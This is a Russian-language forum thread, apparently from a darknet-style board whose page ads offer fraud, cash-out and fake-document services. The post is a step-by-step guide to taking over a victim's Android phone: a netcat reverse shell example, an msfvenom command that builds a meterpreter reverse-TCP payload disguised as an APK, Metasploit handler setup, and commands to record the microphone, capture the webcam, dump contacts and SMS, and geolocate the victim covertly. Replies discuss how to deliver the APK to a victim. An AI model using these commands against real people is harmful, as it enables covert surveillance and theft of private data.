Получаем доступ к Android [kali Linux]

WU transfers Переводы Western Union. 50/50. Лучшие условия на рынке
Отрисовка у Васи Рогова Монтаж, редактирование и отрисовка документов различной сложности
Заливы по СНГ Сбер,Тинькоф,Райф и многие другие. Ищем надежных партнеров!
Motorola shop Любая техника с Amazon/Ebay за 40%. Доставка по всему миру.
Bitcoin soft by BOND Софт для поиска забытых BTC-кошельков
Даркнет реклама под ключ Шопы, чекеры, логи, софт, обнал, фин-сервисы. ТГ трафик, который работает!
Продажа E-Gift cards; Amazon, iTunes, Carter's, Walmart, Best Buy и др.
MiroslavchikPesron

MiroslavchikPesron

Опытный user
Регистрация
10 Фев 2022
Сообщения
162
Реакции
7
Принцип работы:

Простыми словами, сначала создадем приложение(payload), в конце у нас будет сессия meterpreter. Все операции выполняются с помощью утилит на базе операционной системы Kali Linux.

Принцип работы проще всего понять на примере двух окон терминала. Представим, что это жертва и хакер. Последний запускает в себя команду в терминале:
Код:


nc -l -p 8577

Жертва в свою очередь подключается к этому открытому порту:
Код:

Код: 
nc 192.168.1.1 8577 -e /bin/bash

  • Таким образом, произошло подключение к открытому порту. Теперь в первом терминале можно запустить несколько команд, которые можно использовать на машине жертвы.

  • Вот по такому принципу мы будет работать с android. Принцип работы с payload может быть намного сложнее, но в этом основная суть.
  • Создание payload

  • Открываем терминал и с помощью такого набора создаем приложение с расширением. apk, которое будет доступно в корневой директории. Вместо звездочки нужно указать свой IP. Можно быстро посмотреть в терминале с помощью команды ifconfig:
Код:

Код: 
msfvenom -p android/meterpreter/reverse_tcp LHOST=* LPORT=4444 R >shell.apk

  • После выполнения команды в корневой директории будет создан файл shell.apk.

Посмотреть вложение 1463

  • Далее необходимо запустить msfconsole.
Код:

Код: 
msfconsole

После этого последовательно выполняем все команды:
Код:

Код: 
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST ВашIP
set LPORT 4444
exploit

  • После этого, человек должен запусить shell.apk.
Некоторые полезные команды:
Код:

Код: 
record_mic
webcam_snap
webcam_stream
dump_contacts
dump_sms
geolocate

После установления сессии на телефоне не происходит никаких действий. Можно спокойно удаленно следить за жертвой, если у нее будет активное интернет соединение.
 
Torsten

Torsten

Опытный user
Регистрация
7 Ноя 2021
Сообщения
931
Реакции
112
Выглядит сложно, но на выходных пропробую на своем провернуть.
 
Mastersam

Mastersam

Опытный user
Регистрация
20 Июл 2021
Сообщения
184
Реакции
7
Осталось придумать,как апк файл закинуть жертве
 
Войдите или зарегистрируйтесь для ответа.

Похожие темы

  1. Hyper.png
    Получаем доступ к Android [Kali Linux]
    Ответы
    1
    Просмотры
    2K
    ^Terminal^
    ^Terminal^
  2. Achtung
    Получаем доступ к Android [Kali Linux]
    Ответы
    0
    Просмотры
    2K
    Achtung
    Achtung
  3. Xanthias
    Миллионы на бесплатном Wi-Fi
    Ответы
    12
    Просмотры
    2K
    lelo_leovsky
    lelo_leovsky
  4. BendrickGood
    Полезные Android приложения для каждого.
    Ответы
    2
    Просмотры
    2K
    Viktor94
    Viktor94
  5. S
    Получаем ранний доступ к криптокошельку
    Ответы
    6
    Просмотры
    1K
    Deepins
    D
Сверху Снизу